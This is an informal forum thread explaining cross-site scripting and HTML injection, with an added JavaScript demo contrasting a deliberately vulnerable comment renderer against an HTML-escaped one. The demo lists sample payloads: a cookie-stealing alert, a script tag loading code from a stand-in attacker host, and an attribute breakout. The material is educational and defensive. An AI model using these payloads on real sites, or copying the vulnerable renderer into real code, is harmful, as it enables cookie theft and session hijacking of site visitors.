What The Hek is This Vulnerability Abt.
The article that el-half posted is an excellent introduction to XSS, and you should read it. It's not the whole story, though. First of all, their countermeasures section is a little skimpy. For instance, they fail to mention that most scripting languages have commands to clean up input so that you can't have any HTML junk from users. In PHP, the function is called htmlspecialchars(); in ASP, it's Server.HTMLEncode().
The article also fails to even touch on HTML injection, which is related. In many web applications — usually crappy bulletin board systems — you can inject HTML into the database, such that you can rewrite the web page that other users see. Attackers have used this in the past to tweak the noses of corporations by making their web sites say bad things about them. A more sinister possibility is to inject HTML to download a browser exploit, so that, for instance, anyone visiting a particular site using Win IE finds that the attacker now 0wn3z their computer. Fortunately, HTML injection is pretty easy to avoid: it's just a matter of calling the same functions you would use to prevent XSS.
Finally, I cannot say enough good things about the Open Web Applications Security Project Guide. It contains loads of clear information about writing secure web applications, including info on XSS.
Cross Site Scripting is a vulnerability used to insert code into places it shouldn't be (+/-)...
As you can imagine, this is used in the wrong way by the wrong people.
A common example is the creation of a false bank website and then XSSing the login part to mail the hacker your data. This has happened before. It can also be used to steal cookies and other stuff.
If you want to learn more, I suggest you read this. For info on how to avoid these kinds of attacks, check this out.
Note: if you use Hotmail/Yahoo and some other popular email providers, I suggest you check them for this vulnerability. Those I mentioned were vulnerable last year, but they have probably done something about it by now.
From what I understand, a simple JavaScript can be placed in the page that will display the cookie: JAVASCRIPT ALERT - "document.cookie"
You just make a JavaScript alert and place "document.cookie" as the body.
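An added example, not code from any post in this thread or from the articles it links, tying together the two points raised above: the document.cookie alert payload from the last post, and the htmlspecialchars()/Server.HTMLEncode() style of escaping from the first reply. It simulates a bulletin board that stores a comment and renders it for other visitors, once the vulnerable way and once with every user-controlled value escaped. The payloads, the attacker.example host and the comment markup are all constructed for the demo.

```javascript
// Added example, not code from the thread or from any project it mentions.
// Simulates a bulletin board that stores a user's comment and renders it for
// other visitors, first the vulnerable way, then with the same treatment
// PHP's htmlspecialchars() / ASP's Server.HTMLEncode() apply.
// All payloads, names and hosts below are constructed for the demo.

// Equivalent of htmlspecialchars($s, ENT_QUOTES): the five characters that can
// start a tag, end an attribute value, or begin an entity are replaced by
// entities, so the browser shows them as text instead of parsing them.
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, "&amp;")   // must come first, or later entities get double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Reverse mapping, used only to show the escaped output still displays the
// user's text exactly (escaping is lossless, unlike stripping "bad" characters).
function htmlUnescape(s) {
  return String(s)
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&amp;/g, "&");  // must come last
}

// Vulnerable renderer: user-controlled strings are concatenated straight into
// the page, so whatever HTML was stored in the database is parsed by every
// visitor's browser (HTML injection / stored XSS).
function renderCommentVulnerable(author, body) {
  return `<div class="comment" data-author="${author}"><p>${body}</p></div>`;
}

// Hardened renderer: identical markup, but each user value is escaped at the
// point it is inserted. The attribute value is escaped too; with only < and >
// escaped, the attrBreakout payload below would still escape the attribute.
function renderCommentSafe(author, body) {
  return `<div class="comment" data-author="${htmlEscape(author)}"><p>${htmlEscape(body)}</p></div>`;
}

// Does the user's raw input survive unchanged in the output? If so the browser
// will parse it as markup rather than display it as text.
function markupSurvives(html, userInput) {
  return html.includes(userInput);
}

// Constructed payloads of the kinds described in the thread.
const PAYLOADS = {
  // the classic test: pop the visitor's cookies in an alert
  cookieAlert: "<script>alert(document.cookie)</script>",
  // defacement / drive-by: rewrite the page to load a script from elsewhere
  remoteScript: '<script src="http://attacker.example/x.js"></script>',
  // attribute breakout: needs quote escaping, not just < and >
  attrBreakout: '" onmouseover="alert(document.cookie)',
};

// Render each payload both ways and report whether it stays live, and whether
// the escaped version still round-trips to exactly the text the user typed.
function demo() {
  const report = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    // the breakout payload targets the attribute, the others the comment body
    const args = name === "attrBreakout" ? [payload, "hello"] : ["bob", payload];
    report[name] = {
      vulnerable: markupSurvives(renderCommentVulnerable(...args), payload),
      safe: markupSurvives(renderCommentSafe(...args), payload),
      displayedText: htmlUnescape(htmlEscape(payload)) === payload,
    };
  }
  return report;
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of the third payload is why the first reply's advice matters in the attribute case as well: escaping only `<` and `>` stops the two script-tag payloads but leaves the quote-breakout alive, which is why htmlspecialchars() is normally called with ENT_QUOTES (and Server.HTMLEncode() encodes quotes by default).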